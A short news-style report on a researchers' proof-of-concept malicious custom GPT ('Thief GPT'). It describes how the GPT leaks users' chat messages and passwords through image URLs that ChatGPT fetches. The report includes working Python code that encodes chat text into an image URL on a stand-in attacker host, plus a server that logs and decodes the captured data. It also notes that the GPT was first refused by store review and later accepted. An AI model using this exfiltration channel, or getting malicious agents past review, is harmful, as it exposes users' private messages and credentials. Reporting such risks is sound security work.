In November 2023, OpenAI publicly released GPTs, a feature that lets anyone build and share customized versions of ChatGPT.
Since then, users have created many custom GPTs for a wide range of purposes.
However, threat actors can use the same feature to build GPTs of their own that perform malicious activities.
Researchers have developed a proof-of-concept GPT to demonstrate how easily cybercriminals can steal user information, such as chat messages and passwords, or generate malicious code through crafted chat requests.
This malicious ChatGPT agent was built to forward users' chat messages to a third-party server and to prompt them for sensitive information such as usernames and passwords.
This is possible because ChatGPT renders images from any website: when a GPT embeds data in an image URL, the request that fetches the image delivers that data to the third-party server.
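To illustrate this channel (not the researchers' actual implementation), the sketch below shows how a chat message could be smuggled inside an image URL's query string. The endpoint attacker.example, the parameter name d, and the helper function are all hypothetical.

```python
import base64
from urllib.parse import quote

# Hypothetical attacker-controlled endpoint (illustration only).
EXFIL_ENDPOINT = "https://attacker.example/pixel.gif"

def build_exfil_image_url(chat_message: str) -> str:
    """Encode a chat message into an image URL's query string.

    When a GPT emits markdown like ![ ](url), ChatGPT fetches the URL
    to render the image, and the encoded payload rides along in the
    request to the third-party server.
    """
    payload = base64.urlsafe_b64encode(chat_message.encode("utf-8")).decode("ascii")
    return f"{EXFIL_ENDPOINT}?d={quote(payload)}"

if __name__ == "__main__":
    # A malicious GPT would embed this URL as an inline image.
    print(build_exfil_image_url("user: my password is hunter2"))
```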
A GPT can also carry instructions that ask the user for information and send it anywhere, depending on how the GPT is configured. The demo GPT, named Thief GPT, was capable of asking users questions and secretly forwarding the answers to a third-party server.
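On the receiving side, the attacker only needs a server that logs incoming query parameters while returning a plausible image. Below is a minimal, hypothetical sketch using Python's standard library; the port and parameter name match the assumptions of the previous snippet and do not come from the report.

```python
import base64
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

# 1x1 transparent GIF so the "image" renders without errors.
PIXEL = base64.b64decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7")

class ExfilHandler(BaseHTTPRequestHandler):
    """Logs the hypothetical `d` query parameter of every image request."""

    def do_GET(self):
        params = parse_qs(urlparse(self.path).query)
        for payload in params.get("d", []):
            try:
                print("captured:", base64.urlsafe_b64decode(payload).decode("utf-8"))
            except Exception:
                print("captured (raw):", payload)
        # Respond with a harmless-looking pixel image.
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", str(len(PIXEL)))
        self.end_headers()
        self.wfile.write(PIXEL)

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), ExfilHandler).serve_forever()
```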
When the researchers first tried to publish it, ChatGPT's publishing guidelines denied the request.
According to the documentation, ChatGPT offers creators three publishing options: Only me, Anyone with a link, and Public.
The issue was quickly fixed, and the GPT was then accepted by the GPT Store.
This led to the conclusion that malicious actors could exploit the publicly available GPT-building feature for malicious purposes.
A complete report has been published that details the method, its usage, and other information.